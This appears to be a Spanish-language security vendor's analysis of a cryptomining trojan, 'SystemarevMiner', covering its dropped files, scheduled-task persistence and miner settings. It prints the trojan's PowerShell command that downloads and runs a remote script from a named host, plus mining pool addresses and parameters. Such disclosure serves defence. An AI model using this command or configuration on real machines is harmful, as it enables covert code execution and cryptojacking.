360 Security Center descubrió recientemente un tipo de troyano Cryptominer que se está propagando activamente en la red. Este troyano oculta malwares de criptoinvasión tras ciertas tareas programadas para evitar la detección del software antivirus. Además, incluso aunque se detecte y elimine el troyano, este aún puede vivir mientras exista el archivo de script. Lo hemos denominado “SystemarevMiner”.

Análisis
El troyano se instala en el ordenador del usuario principalmente a través de complementos de juegos y cracks de software, liberando los siguientes archivos después de descargar el paquete de instalación:
c: \ program files \ systemarev \ revservicesx \ app_loader.exe
c: \ program files \ systemarev \ revservicesx \ systemupdate64x.exe
C: \ Program Files \ Common Files \ restore_rev.bat

Crea múltiples tareas programadas y programas de inicio de servicios:

Se establece el archivo restore_rev.bat como oculto y se agrega a las tareas programadas. El archivo por lotes usa Powershell para descargar el nuevo script troyano: powershell -ExecutionPolicy ByPass -WindowStyle Hidden -Command “iex ((new-object net.webclient).DownloadString(‘http://77.super-me.online/files/restore_rev_inj.ps1’))”

Restore_rev_inj.ps1 se descarga como un script de powershell. El contenido se muestra a continuación:

Mediante el script, los archivos que descargan las aplicaciones son:
amd64.exe es una aplicación de minería de criptomonedas que utiliza una tarjeta gráfica OpenCL de AMD para efectuar el criptominado
Parámetro del minero: “-B –no-color -r 50 -o 85.25.74.57:2228 -u x -p x –variant -1 -k –nicehash”

cud8.exe es una herramienta de minería de criptomonedas que utiliza la tarjeta gráfica de nvidia para efectuar el criptominado
Parámetro del minero: “-B –no-color -r 50 -o 85.25.74.57:2229 -u x -p x –variant 1 -k –nicehash”

64.exe es XMR/XMV, y usa la CPU para efectuar el criptominado
Parámetro del minero:”–auto –any –forever –variation 3 -o xmr-us-east1.nanopool.org:14444 -u [HASH].jce2/x@x.com -p x”

Podemos ver los ingresos:

El otro grupo de minería más rentable:

Los ingresos totales de la cuenta minera:

MServicesX.exe es un paquete de instalación para el troyano, con el objetivo de restaurar los primeros tres archivos de la instalación. Incluso si se eliminan estos archivos, aún puede devolverlos a la vida.

Memoro
Hace poco, hemos descubierto que se está extendiendo mucho el malware de CryptoMiner. Recomendamos encarecidamente a los usuarios que habiliten el software antivirus al instalar nuevas aplicaciones. También recomendamos que los usuarios realicen un escaneo de antivirus con 360 Total Security para que eviten ser víctimas de CryptoMiner.